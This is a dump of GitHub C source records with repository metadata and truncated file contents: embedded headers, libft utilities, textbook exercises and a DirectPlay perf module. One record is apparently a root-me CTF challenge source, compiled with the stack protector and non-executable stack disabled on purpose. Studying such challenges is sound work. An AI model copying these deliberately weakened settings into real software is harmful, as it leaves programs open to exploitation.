blob_id
stringlengths
40
40
directory_id
stringlengths
40
40
path
stringlengths
2
268
content_id
stringlengths
40
40
detected_licenses
listlengths
0
58
license_type
stringclasses
2 values
repo_name
stringlengths
5
118
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
branch_name
stringclasses
816 values
visit_date
timestamp[us]
revision_date
timestamp[us]
committer_date
timestamp[us]
github_id
int64
2.31k
677M
star_events_count
int64
0
209k
fork_events_count
int64
0
110k
gha_license_id
stringclasses
23 values
gha_event_created_at
timestamp[us]
gha_created_at
timestamp[us]
gha_language
stringclasses
151 values
src_encoding
stringclasses
33 values
language
stringclasses
1 value
is_vendor
bool
2 classes
is_generated
bool
2 classes
length_bytes
int64
3
10.3M
extension
stringclasses
119 values
content
stringlengths
3
10.3M
authors
listlengths
1
1
author_id
stringlengths
0
228
5e66902368a5b13f4e3f8bd36ad9a7d4f0b13be4
c6f03355d52d0a2581717db7ba67192413d52d00
/src/user.h
128b03443768b712db6143dfacdba7314907bb78
[ "BSD-2-Clause" ]
permissive
torpesco/pflask
447e013bcd8794ea718934f1e09520a0dd1d3744
26df80884a445cdaa8bc57ec1b31426ddac4c92c
refs/heads/master
2021-01-20T15:33:02.921463
2017-10-24T20:10:12
2017-10-24T20:10:12
90,785,306
1
0
null
2017-05-09T19:42:32
2017-05-09T19:42:32
null
UTF-8
C
false
false
1,780
h
/* * The process in the flask. * * Copyright (c) 2013, Alessandro Ghedini * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are * met: * * * Redistributions of source code must retain the above...
[ "alessandro@ghedini.me" ]
alessandro@ghedini.me
d4e718b82709fe7f4ca2e89b0373b98fcf15e107
bfeb573a183d2dd91b2b2be8305690dfd16f013c
/Core/Inc/stm32f0xx_it.h
02e4a0597e94d709db5ba558b5183fce96769d42
[]
no_license
kingovchouffe/test_led_nucleo
02cfc5ba55bf8ccb735edd99285bf7dc4f783da0
7c18acb0903d3094ae7855026930f297611ac279
refs/heads/main
2023-06-05T07:20:00.209084
2021-06-28T14:23:14
2021-06-28T14:23:14
376,493,018
1
0
null
null
null
null
UTF-8
C
false
false
1,948
h
/* USER CODE BEGIN Header */ /** ****************************************************************************** * @file stm32f0xx_it.h * @brief This file contains the headers of the interrupt handlers. ****************************************************************************** * @attention * * <h2...
[ "46623009+kingovchouffe@users.noreply.github.com" ]
46623009+kingovchouffe@users.noreply.github.com
1656e46a2326eff31893f104dd3529afbaad62ec
6f91e32ad1861a7c7075b57b9cd15a003084ed60
/CCPExtension/Extension/SomeDefines.h
44df3fdcaf08c0bfc01283d90a5b5e1aa982d535
[]
no_license
coolboy-ccp/CCPExtension
40281327aaead04e7dcdf8a84836b76ad9a29550
e851bf794fdba49c35b219f0e4a3f127716774a4
refs/heads/master
2020-12-13T19:59:19.342073
2017-09-01T02:25:31
2017-09-01T02:25:31
95,514,125
2
1
null
null
null
null
UTF-8
C
false
false
2,311
h
// // SomeDefines.h // CCPExtension // // Created by Ceair on 17/6/30. // Copyright © 2017年 ccp. All rights reserved. // #ifndef SomeDefines_h #define SomeDefines_h /* * 打印设置 * 测试模式打印 * 非测试模式不打印 * 更换环境路径: * 1.Target->BuildSettings->Preprocessor Macros->Debug * 2.Product->Scheme->SchemeEdit Scheme */ #ifde...
[ "chuchengpeng0119@163.com" ]
chuchengpeng0119@163.com
70e5b45fe760060f8213487f2304a70a6093684e
2864d96b9cc69562994bdc7819e4006f16d9729d
/libft/ft_strsub.c
7c5cf769715650f1a8e0acd605d77e099cb67373
[]
no_license
akorshun/gnl_list
b15184a9d4ab4cc8a0edf12fa110741564e50e23
d8952a1e70d3a99dd65d085c1b95448be9932a66
refs/heads/master
2020-07-29T02:16:36.654865
2019-10-23T17:56:54
2019-10-23T17:56:54
209,629,812
0
0
null
null
null
null
UTF-8
C
false
false
1,208
c
/* ************************************************************************** */ /* */ /* ::: :::::::: */ /* ft_strsub.c :+: :+: :+: ...
[ "razor1702@gmail.com" ]
razor1702@gmail.com
325c1626bd6d019cde967db771659a3ce864ffd7
08393f0b078e68b71524f291e90580be5070a413
/004.variable_argv/main.c
a2c6b6c960c3b15fdb907c8ea2b9d3cb65d14f88
[]
no_license
sunzhongmeng/c-practise
10ebb55b6bfe2d268b3511847bc5ef9f4a2dd8b3
c7a703579edee9b71971be57c216db1d7f85be45
refs/heads/master
2020-05-17T17:39:06.248222
2019-05-07T06:23:02
2019-05-07T06:23:02
183,860,060
0
0
null
null
null
null
UTF-8
C
false
false
501
c
#include <stdio.h> #include <stdarg.h> double average(int num,...) { va_list valist; double sum = 0.0; int i; /*为num个参数初始化valist*/ va_start(valist,num); /*访问所有赋给valist的参数*/ for(i=0;i<num;i++){ sum += va_arg(valist,int); } /*清理为valist保留的内存*/ va_end(valist); return sum/num; } int main(int argc,char* argv...
[ "sunzhongmeng@gmail.com" ]
sunzhongmeng@gmail.com
a77d589ad6d451bd8d80986e375251387708906e
fdc578424a878cab864c091eab7699dfd3d41fef
/root-me/ch17.c
f72884b3073480f2d6ec1c619ca809e1beb39c2c
[]
no_license
sploitem/wargames
919dd92114d59a27108ade80f5c375fbf9c88bcb
38b767f4f1c97cbdff4a5784f9612421bb06f3ff
refs/heads/master
2021-06-12T05:15:03.678853
2021-05-28T07:32:15
2021-05-28T07:32:15
137,091,026
1
0
null
null
null
null
UTF-8
C
false
false
824
c
/* gcc -m32 -fno-stack-protector -z execstack -o ch17 ch17.c */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> int main(int argc, char ** argv) { // char log_file = "/var/log/bin_error.log"; char outbuf[512]; char buffer[512]; char user[12]; ch...
[ "sploitem@gmail.com" ]
sploitem@gmail.com
96ed5818c99c6779b0e441fb2c2ad8ad16bd3056
3fe8d1a9362ece49aa1c91a712054fb0af312716
/corewar/libft/ft_striteri.c
a5d9e07a91de790f9780cbf52459c77029b00fb8
[]
no_license
furyou81/C-projects
6afeef6a6e9b5f91fd5148c9aa549ecb361cd563
375338255b20bb1de538f246b4999264290543b6
refs/heads/master
2020-04-07T20:13:32.966908
2018-11-22T10:50:21
2018-11-22T10:50:21
158,679,989
0
0
null
null
null
null
UTF-8
C
false
false
1,087
c
/* ************************************************************************** */ /* */ /* ::: :::::::: */ /* ft_striteri.c :+: :+: :+: ...
[ "lfujimot@e1r10p17.42.fr" ]
lfujimot@e1r10p17.42.fr
e22cb2746c975feaae257ff6c3afc21854d421a5
93826f0f62f8a33aaa5dbc90a033cd3cf1208bd5
/Drift/Utilities/DRMacros.h
726c5b24e3ed94ea1118a762e2364d718b65506a
[ "MIT" ]
permissive
aouhaddou/Drift
1c7e7823f10c2159da5ec8e6664e5e68c66d2bab
6566a48ea5299e76cde49a4d4c1ddd53f3d74e25
refs/heads/master
2021-01-12T10:12:49.354906
2014-08-26T11:48:14
2014-08-26T11:48:14
null
0
0
null
null
null
null
UTF-8
C
false
false
1,686
h
// // EEEMacros.h // fileee // // Created by Christoph on 3/21/13. // // //Debug Logging #ifdef DEBUG # define DLog(...) NSLog(__VA_ARGS__) #else # define DLog(...) /* */ #endif //User interface idiom #define UIIdiomIsPhone [[UIDevice currentDevice] userInterfaceIdiom] == UIUserInterface...
[ "mail@christophalbert.com" ]
mail@christophalbert.com
9411020142fd541bd002ee6361686443d12ac733
91a882547e393d4c4946a6c2c99186b5f72122dd
/Source/XPSP1/NT/multimedia/directx/dplay/dplay/dplay/perf.c
a30397ba5b54a9773558db07b79993a568251785
[]
no_license
IAmAnubhavSaini/cryptoAlgorithm-nt5src
94f9b46f101b983954ac6e453d0cf8d02aa76fc7
d9e1cdeec650b9d6d3ce63f9f0abe50dabfaf9e2
refs/heads/master
2023-09-02T10:14:14.795579
2021-11-20T13:47:06
2021-11-20T13:47:06
null
0
0
null
null
null
null
UTF-8
C
false
false
5,497
c
/*========================================================================== * * Copyright (C) 1995 - 1997 Microsoft Corporation. All Rights Reserved. * * File: perf.c * Content: uses a memory mapped file to send dp_perfdata to directx control * panel. see dpcpl.h and MANROOT\dxcpl\dplay.c * * H...
[ "support@cryptoalgo.cf" ]
support@cryptoalgo.cf
f1ada981e79e0a88ecf069e480b0f27eaba5139b
bcddca991afe606180dbb5ce6c033d8fb611154c
/components/esp_eth/include/esp_eth_mac.h
d0e9b632ef119a64ba46d9d11040884cd8575805
[ "Apache-2.0" ]
permissive
EmbeddedSystemClass/esp-idf
8ac5a312be41936b1e2dc5c68b7b68c9b4c1e488
92db6a3dabc1106b72865b8bd91d9bdd54fbdf6c
refs/heads/master
2022-12-31T19:57:49.052365
2020-10-22T19:19:01
2020-10-22T19:19:01
259,859,439
0
0
Apache-2.0
2020-04-29T07:47:48
2020-04-29T07:47:47
null
UTF-8
C
false
false
12,967
h
// Copyright 2019 Espressif Systems (Shanghai) PTE LTD // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required b...
[ "koson.trachu@gmail.com" ]
koson.trachu@gmail.com
8887e45c865d655e466baaf064b082f154ec0a8b
fa2dccaa9c8efa70b3da9008109a1cc9ba312939
/popDyn/EBTtool/fns/ebtmain.c
1bccba5f588b3f03eeaba614e523124383e759c6
[ "0BSD", "LicenseRef-scancode-unknown-license-reference" ]
permissive
add-my-pet/DEBtool_M
28fb716cd4317fa1554c112b71640886b053bb15
70cda54e82400090acae5367b1d073b3bf84f4a0
refs/heads/master
2023-09-01T08:31:40.208701
2023-09-01T06:11:44
2023-09-01T06:11:44
35,045,399
19
15
NOASSERTION
2022-06-22T09:52:43
2015-05-04T16:16:05
HTML
UTF-8
C
false
false
14,346
c
/*** NAME ebtmain.c PURPOSE This file contains the main routine of the EBT program. NOTES HISTORY AMdR - Jul 19, 1995 : Created. AMdR - Nov 18, 2014 : Revised last. ***/ #define EBTMAIN_C /* Identification of file */ #define EBTLIB /* and file grou...
[ "bas.kooijman@vu.nl" ]
bas.kooijman@vu.nl
5d3caecd9fbe3a66f2e677315cfda919abdc97be
f5af26c01bcaef88ae59643de5f68e8beabdf46a
/Chapter6/Prac6_3.c
621f584601c23698aa58566fe32f1ff8bf5691ef
[]
no_license
RockADai/TCPL
caf6be8abedb6dfc5e42800e8097e1178ac48288
63d234fca3ea0cb000d0960bf5bc2478e846ae6f
refs/heads/master
2020-03-18T18:41:39.781001
2018-09-08T15:22:01
2018-09-08T15:22:01
135,109,319
0
0
null
null
null
null
UTF-8
C
false
false
3,483
c
#include <stdio.h> #include <ctype.h> #include <string.h> #include <stdlib.h> /* 编写交叉引用程序,打印文档中所有单词的列表,且每个单词还有一个列表记录其出现的行号 对the、and等非实义单词不予考虑 */ #define MAXWORD 100 struct linklist{ int lnum; struct linklist *ptr; };//单链表定义 struct tnode{ char *word; struct linklist *lines; struct tnode *left; ...
[ "919640346@qq.com" ]
919640346@qq.com
e4a0cf334ea35dc211e26a6279bfad6f22e061f8
1c6ddbc9ba44ab736ec8d09bfdb94b5e273f7391
/src/bip44.h
f5c045f7ee8ecd5e67851075bf5c02c0be2f2a0b
[ "Apache-2.0" ]
permissive
vacuumlabs/ledger-cardano-app
e53c412df670174df0d512f32c1d551f9bad2c13
2be80999429bb537f0a0cb2523310c446431c52b
refs/heads/master
2020-04-12T03:04:58.776636
2019-02-19T10:16:26
2019-02-19T10:16:26
162,263,104
4
1
Apache-2.0
2019-02-16T15:24:26
2018-12-18T09:26:18
C
UTF-8
C
false
false
1,288
h
#ifndef H_CARDANO_APP_BIP44 #define H_CARDANO_APP_BIP44 #include "common.h" static const uint32_t BIP44_MAX_PATH_LENGTH = 10; typedef struct { uint32_t path[BIP44_MAX_PATH_LENGTH]; uint32_t length; } bip44_path_t; static const uint32_t BIP_44 = 44; static const uint32_t ADA_COIN_TYPE = 1815; static const uint32...
[ "peter.peresini@gmail.com" ]
peter.peresini@gmail.com
02b8bcf1b885aa4ecb95772af3ad7877d3b78892
84f9ca2161b9a260a55a8b6e1f4efc8de6bacb15
/src/support/cleanse.h
8aab884b1c7ffa310c5bd20b2a3f33baf0306b3a
[ "MIT" ]
permissive
fngtrade/firstcoin
1d2352e5c87593d2d51fd78ba4c7ddcc5e89bbb1
d7ee42952bd611c62a83154151ec883e23f8593a
refs/heads/master
2021-05-12T10:28:26.167239
2018-01-13T15:26:39
2018-01-13T15:26:39
117,353,193
0
0
null
null
null
null
UTF-8
C
false
false
417
h
// Copyright (c) 2009-2010 Satoshi Nakamoto // Copyright (c) 2009-2015 The Bitcоin Core developers // Distributed under the MIT software license, see the accompanying // file COPYING or http://www.opensource.org/licenses/mit-license.php. #ifndef FIRSTCOIN_SUPPORT_CLEANSE_H #define FIRSTCOIN_SUPPORT_CLEANSE_H #include...
[ "fstc@protonmail.com" ]
fstc@protonmail.com
3e88d2ad6eea1571013318c63db94535c3b736b6
2b194304ba3baa628b806c2adacbf47975ac9387
/700-searchinabst.c
2b380caf287bd42d5a5dd1d41df9cf2f02db2fbc
[]
no_license
rkhalidos/leet-coding
763c467e83d52183c422594ecd032877b5283326
4702cda3ba93eeb09c1a108fd9eeb63ab6e25ab9
refs/heads/master
2022-10-04T04:43:41.475151
2020-06-11T10:03:20
2020-06-11T10:03:20
262,337,538
0
0
null
2020-05-28T08:31:40
2020-05-08T13:57:52
C
UTF-8
C
false
false
679
c
/* Given the root node of a binary search tree (BST) and a value. You need to find the node in the BST that the node's value equals the given value. Return the subtree rooted with that node. If such node doesn't exist, you should return NULL. Runtime: 20ms Memory: 14.9 MB Top 95.22% of all C submissions */ /** * Def...
[ "noreply@github.com" ]
rkhalidos.noreply@github.com
d1faa7ad294613c7dc1eb568be765e628be13f00
d81f2fa3a2b5bd2897cff219e5b9bee9c458b6f6
/include/configuration.h
25609abbdf7460c974ff75791da12952a4fb50d3
[]
no_license
lmaraite/tcp-server
0eb285bcafcad5fc0ea7ca6b730878851d094885
554afe929923e2bc33c6a5cc8591bd975147b309
refs/heads/main
2023-06-10T10:45:37.449750
2021-06-28T19:17:17
2021-06-28T19:17:17
366,682,128
6
1
null
2022-10-27T17:48:23
2021-05-12T10:47:23
C
UTF-8
C
false
false
409
h
#ifndef TCP_SERVER_CONFIGURATION_H #define TCP_SERVER_CONFIGURATION_H #include <limits.h> typedef struct { int PORT; char PATH[PATH_MAX]; int MAX_SESSIONS; } Configuration ; extern Configuration config; /* Gibt SUCCESS oder eine Fehlermeldung über 1000 zurück. Lädt die Config aus der in path an...
[ "leon.maraite@gmail.com" ]
leon.maraite@gmail.com
1d5cb45a46340e86be2a46cbced3b3e74348504e
54f352a242a8ad6ff5516703e91da61e08d9a9e6
/Source Codes/AtCoder/arc067/C/1068201.c
eb2b2c1265e9412c16bea74c8c71454d9f4d7ce1
[]
no_license
Kawser-nerd/CLCDSA
5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb
aee32551795763b54acb26856ab239370cac4e75
refs/heads/master
2022-02-09T11:08:56.588303
2022-01-26T18:53:40
2022-01-26T18:53:40
211,783,197
23
9
null
null
null
null
WINDOWS-1250
C
false
false
1,343
c
#include <stdio.h> typedef long long int ll; const int mod = 1000000007; ll dp[1001]; int fact[1001]; int ifact[1001]; int modpow(int n, int k){ int r = 1; for(;k;k>>=1){ if(k&1) r = (ll) r * n % mod; n = (ll) n * n % mod; } return r; } int main(){ int i, j, k, n, a, b, c, d; ...
[ "kwnafi@yahoo.com" ]
kwnafi@yahoo.com
222ff37c5370b8613c19d119c64d36e929a42868
ba10db4523351c590362fe11cd57e102d37cd59d
/Uebung_6/ls.c
454ccc8ed1f446eb9bec5f18dba869f89f3aea5f
[]
no_license
leandertolksdorf/ti3
503244afb7bce32c013f3ba1d4f96938785dd949
9ef7280211aa0aa5d31a752329408edf8d0fa2ec
refs/heads/master
2022-12-19T09:48:35.827011
2020-09-29T16:19:41
2020-09-29T16:19:41
240,765,865
0
0
null
null
null
null
UTF-8
C
false
false
2,570
c
/* TI3: 6. Übungsblatt Bearbeiter: Leander Tolksdorf, Simon Franke Tutor: Leon Dirmeier */ #define _POSIX_C_SOURCE 200809L #define __STDC_WANT_LIB_EXT1__ 1 #include <stdio.h> #include <stdlib.h> #include <dirent.h> #include <string.h> #include <stdbool.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h...
[ "leandet98@andorra.imp.fu-berlin.de" ]
leandet98@andorra.imp.fu-berlin.de
c8b1953c12773f944a7ebca06440d24d4b594c12
bddb4d9e562c0450834012bf2f7d25b6c7439f29
/ap/gpl/ppp/pppd/ipxcp.c
bcc4f6445ab5fd60e40d59c093767122df6e953b
[]
no_license
jameshilliard/R7000-V1.0.2.164_1.0.15_GPL
110591b214b52e64382593b95d3087491255a177
8b9e52e2b01834558d1201af423b4cd84ca1c115
refs/heads/master
2021-01-01T16:02:51.069915
2014-05-13T08:02:30
2014-05-13T08:02:30
19,730,728
4
5
null
2020-03-08T21:41:46
2014-05-13T08:00:47
C
UTF-8
C
false
false
38,959
c
/* * ipxcp.c - PPP IPX Control Protocol. * * Copyright (c) 1989 Carnegie Mellon University. * All rights reserved. * * Redistribution and use in source and binary forms are permitted * provided that the above copyright notice and this paragraph are * duplicated in all such forms and that any documentati...
[ "james.hilliard1@gmail.com" ]
james.hilliard1@gmail.com
7fa445bb36d9364e108ca78b274c9389e8da5325
d8e50207d9c072c321fb961765679482d75a61b3
/GD32F10x/GD32F10x_Firmware_Library_V2.2.1/Examples/RTC/Calendar_demo/main.c
56d1e76c52fca6f22468a5e846bc849ee36774bf
[ "BSD-3-Clause" ]
permissive
zhou-peter/gigadevice-firmware-and-docs
f22e6301051b788b2b547cb32da3f2f8f80ce9dc
c2f545f960f05371aa1945de5b5a72a45612fb7c
refs/heads/main
2023-07-17T19:15:46.501716
2021-09-04T17:57:12
2021-09-04T17:57:12
null
0
0
null
null
null
null
UTF-8
C
false
false
4,426
c
/*! \file main.c \brief RTC calendar \version 2014-12-26, V1.0.0, firmware for GD32F10x \version 2017-06-20, V2.0.0, firmware for GD32F10x \version 2018-07-31, V2.1.0, firmware for GD32F10x \version 2020-09-30, V2.2.0, firmware for GD32F10x */ /* Copyright (c) 2020, Gi...
[ "jesse@keyboard.io" ]
jesse@keyboard.io
36c3e4b24339e9ad35b06f7e6b710937c98d0baa
7f5937c840ea0a0a33270040b15b1ec882422c87
/mud/bin/soul/shakeno.c
ac84d4ba1e8aded2e33075a7a0471d6f6037c5b3
[ "Apache-2.0" ]
permissive
shentino/simud
706fcaad7ca5dd87277e3788592144b0d803476d
644b7d4f56bf8d4695442b8efcfd56e0a561fe21
refs/heads/master
2021-01-17T14:09:07.943177
2016-09-20T10:11:22
2016-09-20T10:11:22
39,277,782
3
2
null
null
null
null
UTF-8
C
false
false
160
c
#include <emote.h> EMOTE( "~Name ~verbshake ~poss head no.@@shaking ~poss head", "~Name ~verbshake ~poss head at ~targ.@@shaking ~poss head at ~targ" )
[ "shentino@gmail.com" ]
shentino@gmail.com
57705f9e40eb153748f0e2b53a57cad8d37b219c
00b9a3f2aa0fd822e2624200a9f4d229607c1501
/fase01/552585_ED2-T01.c
2bdacd834b3eaefc37d1fa9d1290a0ebabe7919d
[]
no_license
joaovsa/ED2_2018
4a63236000dd06c41a3a5f619d7d4bd592d6f81f
5b3bd3a9fe8b8da75b8322e43f08a3fba0f565fb
refs/heads/master
2020-03-31T15:10:31.020721
2018-10-27T23:03:59
2018-10-27T23:03:59
152,327,229
0
0
null
null
null
null
UTF-8
C
false
false
33,500
c
/* ========================================================================== * Universidade Federal de São Carlos - Campus Sorocaba * Disciplina: Estruturas de Dados 2 * Prof. Tiago A. de Almeida * * Trabalho 01 * * RA: 552585 * Aluno: João Vitor de Sá Medeiros Santos * =======================================...
[ "jvsms13@gmail.com" ]
jvsms13@gmail.com
b3d688e9501bd099fdb9e0758bf321fae50aef08
a7f4b65f13aa59264ef0a6cf5b3b781da98d729b
/DS/src/Stack/Stack_with_arrays.c
fc119fe16989316151b6d750d6b193aa53ad208b
[ "MIT" ]
permissive
khushi-b18/DS-Algo
90495f70c14c1544836e19a634c363f8e33f5816
e753c013114ff974dced00ecabb2e3412489e07e
refs/heads/master
2023-01-01T23:01:07.851794
2020-10-30T14:56:43
2020-10-30T14:56:43
307,402,058
0
0
null
2020-10-26T14:36:25
2020-10-26T14:36:24
null
UTF-8
C
false
false
1,663
c
#include <stdio.h> int stack[100],i,j,choice=0,n,top=-1; void push(); void pop(); void display(); //driver code int main () { printf("Enter the number of elements in the stack "); scanf("%d",&n); while(choice != 3) { printf("Input a number to perform operation\n")...
[ "noreply@github.com" ]
khushi-b18.noreply@github.com
8081a93b048fd74aa53be948efde4fcfcd8cde84
21f0bf27aba68fc2db706b481b31c9728b5e96c4
/TTs/TT2/00b/teste.c
6ff56f5becbd75a1577d64bd602047642b4ffa78
[]
no_license
W-F-S/AED2
939e91f349b316b43e47945c65d4160202f15517
91b77399c2c6b5f189a8a2c0cbbd00b1eac2b0f8
refs/heads/master
2023-03-02T20:13:42.580689
2021-01-27T16:28:01
2021-01-27T16:28:01
323,716,396
0
0
null
null
null
null
UTF-8
C
false
false
320
c
//slide 15 //um aluno desenvolveu o codigo abaixo, corrija-o boolean isConsoante(String s, int i){ boolean resp= true; if (i == s.length()){ resp = true; } else if (isConsoante(s.charAt(i)) == false){ resp = false; } else { resp = isConsoante(s, i + 1); } return resp; }
[ "walkerf082@gmail.com" ]
walkerf082@gmail.com
6ac2c1116aceda29e96f2b8934effaa3a101f972
61387be85711cf03ca2cc4144c15369ee9a46796
/zo-mb-es-defender/project.IOs/Project.IOs/Classes/Native/UnityEngine_UnityEngine_Transform_Enumerator2143590864.h
fe81789c65e5e745497b1948d150a76a07cb1618
[]
no_license
hoangwin/raci-ngc-ar_Du-o-iHin-hBa-tC-Hu
6bb6b64052f05bc4026e1cfc6e10844c3dfc574b
29c4f918482e9b850503d9912ebdf7afdafcafed
refs/heads/master
2021-01-10T10:00:33.196405
2016-08-14T23:06:31
2016-08-14T23:06:31
44,680,146
0
0
null
null
null
null
UTF-8
C
false
false
535
h
#pragma once #include "il2cpp-config.h" #ifndef _MSC_VER # include <alloca.h> #else # include <malloc.h> #endif #include <stdint.h> // UnityEngine.Transform struct Transform_t_495934667_0; #include "mscorlib_System_Object_1786876978.h" // UnityEngine.Transform/Enumerator struct Enumerator_t2143590864_0 : publi...
[ "hoang.nguyenmau@hotmail.com" ]
hoang.nguyenmau@hotmail.com
97d5689b11953e51b1eadd5b944ef2d43b420a9f
ace358735f847141617cdc1ca7af3337da4059a7
/prog1.c
4449675a956fa06ea69fb6a82fbb4da8862586f7
[]
no_license
Stesimon01/firstc
44658d00b64c3653cefbedc1540b1b3a6aa374a5
3ac3589bf739ca256a2b33cb21853674ee722247
refs/heads/main
2023-02-21T21:03:58.962431
2021-01-26T23:16:43
2021-01-26T23:16:43
333,238,506
0
0
null
null
null
null
UTF-8
C
false
false
64
c
#include <stdio.h> void main (){ printf("Hello World\n"); }
[ "ssimon00@g.uafs.edu" ]
ssimon00@g.uafs.edu
70e1b784b648555245555f4e062eb50e092c43e6
e4890a880bb28d8e2a1e305bfc49303ef95975b3
/C02/ex09/ft_strcapitalize.c
ea0990b81e3e6be9e0c0b52d06a5253f517fb519
[]
no_license
Mchaveiro/42Lisboa_Piscine
3696f4a37fed78d21023fac57e4c71e20f50308c
8d8136240fe4a6d3e9fb11361e1ab5ecc9dec526
refs/heads/master
2023-01-06T03:50:47.010392
2020-11-05T18:17:15
2020-11-05T18:17:15
309,200,510
0
0
null
null
null
null
UTF-8
C
false
false
1,409
c
/* ************************************************************************** */ /* */ /* ::: :::::::: */ /* ft_strcapitalize.c :+: :+: :+: ...
[ "mchaveir@c1r16s15.42lisboa.com" ]
mchaveir@c1r16s15.42lisboa.com
512ccf41c6a4c4bca33a1e76cfa4cd3d7e7da111
de8c0ea84980b6d9bb6e3e23b87e6066a65f4995
/3pp/linux/arch/powerpc/include/asm/mpc5121.h
9ae49e743b34da9b7916f8f4b9cbffa3e9e36508
[ "MIT", "Linux-syscall-note", "GPL-2.0-only" ]
permissive
eerimoq/monolinux-example-project
7cc19c6fc179a6d1fd3ec60f383f906b727e6715
57c4c2928b11cc04db59fb5ced962762099a9895
refs/heads/master
2021-02-08T10:57:58.215466
2020-07-02T08:04:25
2020-07-02T08:04:25
244,144,570
6
0
MIT
2020-07-02T08:15:50
2020-03-01T12:24:47
C
UTF-8
C
false
false
3,863
h
/* SPDX-License-Identifier: GPL-2.0-only */ /* * MPC5121 Prototypes and definitions */ #ifndef __ASM_POWERPC_MPC5121_H__ #define __ASM_POWERPC_MPC5121_H__ /* MPC512x Reset module registers */ struct mpc512x_reset_module { u32 rcwlr; /* Reset Configuration Word Low Register */ u32 rcwhr; /* Reset Configuration Wor...
[ "erik.moqvist@gmail.com" ]
erik.moqvist@gmail.com
e4e714bcd26eb03d41305fc4437d4dc7537c2610
c3bb88e81944625ea1cb9a23bbc23e209bdf100d
/pybricks/pupdevices/pb_module_pupdevices.c
868311adfd36c51fb98ae0094bab2cdc185e23f3
[ "MIT" ]
permissive
BertLindeman/pybricks-micropython
7a275366869bc4788e5337841aec2439c977da42
8f22a99551100e66ddf08d014d9f442f22b33b4d
refs/heads/master
2023-04-11T00:44:21.911227
2021-04-12T19:45:23
2021-04-12T19:45:23
358,292,780
0
0
MIT
2021-04-15T15:24:23
2021-04-15T14:41:40
null
UTF-8
C
false
false
1,696
c
// SPDX-License-Identifier: MIT // Copyright (c) 2018-2020 The Pybricks Authors #include "py/mpconfig.h" #if PYBRICKS_PY_PUPDEVICES #include <pybricks/common.h> #include <pybricks/pupdevices.h> STATIC const mp_rom_map_elem_t pupdevices_globals_table[] = { { MP_ROM_QSTR(MP_QSTR___name__), MP_ROM_QSTR(...
[ "laurens@pybricks.com" ]
laurens@pybricks.com
66bc7670bc4026a51a7978d62540968b89bc9521
3aa58a3cc95e36d2d70ef39c8d6c26fac30ae24b
/Nesoid/neslib/drivers/android/debug.c
dba1f64dd4a5140add36a760e7dd5b593e9f4610
[]
no_license
Medsar2000/androidnes
85acfd0ed422c586dc6cf30d30573a9e57438332
d35dad9b78b0ed1d60e5dfb3a05482f2cb6f178b
refs/heads/master
2021-01-10T16:19:52.310917
2009-08-20T04:08:54
2009-08-20T04:08:54
45,968,573
1
0
null
null
null
null
UTF-8
C
false
false
138
c
#define LOG_TAG "libnes" #include <cutils/log.h> void FCEUD_PrintError(char *s) { LOGE(s); } void FCEUD_Message(char *s) { LOGD(s); }
[ "tvrlooeid@88456e0a-8d3d-11de-88c3-552db54a6a53" ]
tvrlooeid@88456e0a-8d3d-11de-88c3-552db54a6a53
d5a689e2516fa60ac5073289ccc6758a27878447
cb9e48bdba2270d4294fbe918174b5ab49eb77e7
/src/devapi/dev_mmeadc01b_dac_write.c
77561ae741903c98ca86974da6e16ff9ea7ab736
[]
no_license
e362scibar/python-mmeadc01b
6405ca16fb13e8204191333f2bea44655fc7729e
1cf9a72280eac8152595674b8fa2aea8e9c764ba
refs/heads/master
2020-04-11T11:55:37.475042
2018-07-11T04:53:00
2018-07-11T04:53:00
161,764,112
0
0
null
null
null
null
UTF-8
C
false
false
1,735
c
/** * @file dev_mmeadc01b_dac_write.c * @brief MME-ADC01-B: write data to DAC registers * * @note * * @date 2017-11-16 * @author ymzk/tokki */ #include <stdio.h> /* printf() */ #include <stdint.h> /* uint32_t */ #include <sys/ioctl.h> ...
[ "maesaka@spring8.or.jp" ]
maesaka@spring8.or.jp
544d4614b37aae4dc4d030d1d3adc950db82c04e
b8b379343225405eabce17913be01af19d503266
/firmware/USB_Device/App/usbd_cdc_if.c
8ec88f9533c12c3b9e6663ff183f06a956e6cd53
[]
no_license
samerps/charge-hf
be67c7ae2a709f4d7847d53581c2967e214ec381
6ad999272ca6cf399272bf90e22bbc1fe0a76c22
refs/heads/main
2023-03-08T02:52:38.956716
2021-02-20T18:45:28
2021-02-20T18:45:28
null
0
0
null
null
null
null
UTF-8
C
false
false
16,449
c
/* USER CODE BEGIN Header */ /** ****************************************************************************** * @file USB_Device/CDC_Standalone/USB_Device/App/usbd_cdc_if.c * @author MCD Application Team * @brief This file implements the USB device descriptors. *************...
[ "niklas@fiba.systems" ]
niklas@fiba.systems
225dcfc699e503d75a7613d4174d60c41cc66574
caf6a8ac778eeb3183a7a35523044a5905519b76
/Common/entity/tailor.c
3749a021ac54f167da10a5e206efbb1241915254
[]
no_license
odasm/coh-original-server-vs2010
ec8ddd227d6d99e08e562b2c0b08df20e06eb02c
479e4baccd5b2688c216674492c4b87e4562595c
refs/heads/master
2020-05-16T07:21:09.364167
2019-04-22T03:21:57
2019-04-22T03:21:57
null
0
0
null
null
null
null
UTF-8
C
false
false
2,517
c
#include "costume.h" #include "power_customization.h" #include "net_packet.h" #include "entPlayer.h" #include "entity.h" #include "character_inventory.h" #include "svr_chat.h" #include "langServerUtil.h" #include "badges_server.h" #include "logcomm.h" int processTailorCost(Packet *pak, Entity *e, int gender...
[ "Woovie" ]
Woovie
b2c4ed2f80dfe1475de8685bf5d2d172d301ab18
976f5e0b583c3f3a87a142187b9a2b2a5ae9cf6f
/source/linux/arch/x86/math-emu/extr_reg_constant.c_fldpi.c
a4141143d9c1ec374ae247aebcc80fc61289a936
[]
no_license
isabella232/AnghaBench
7ba90823cf8c0dd25a803d1688500eec91d1cf4e
9a5f60cdc907a0475090eef45e5be43392c25132
refs/heads/master
2023-04-20T09:05:33.024569
2021-05-07T18:36:26
2021-05-07T18:36:26
null
0
0
null
null
null
null
UTF-8
C
false
false
685
c
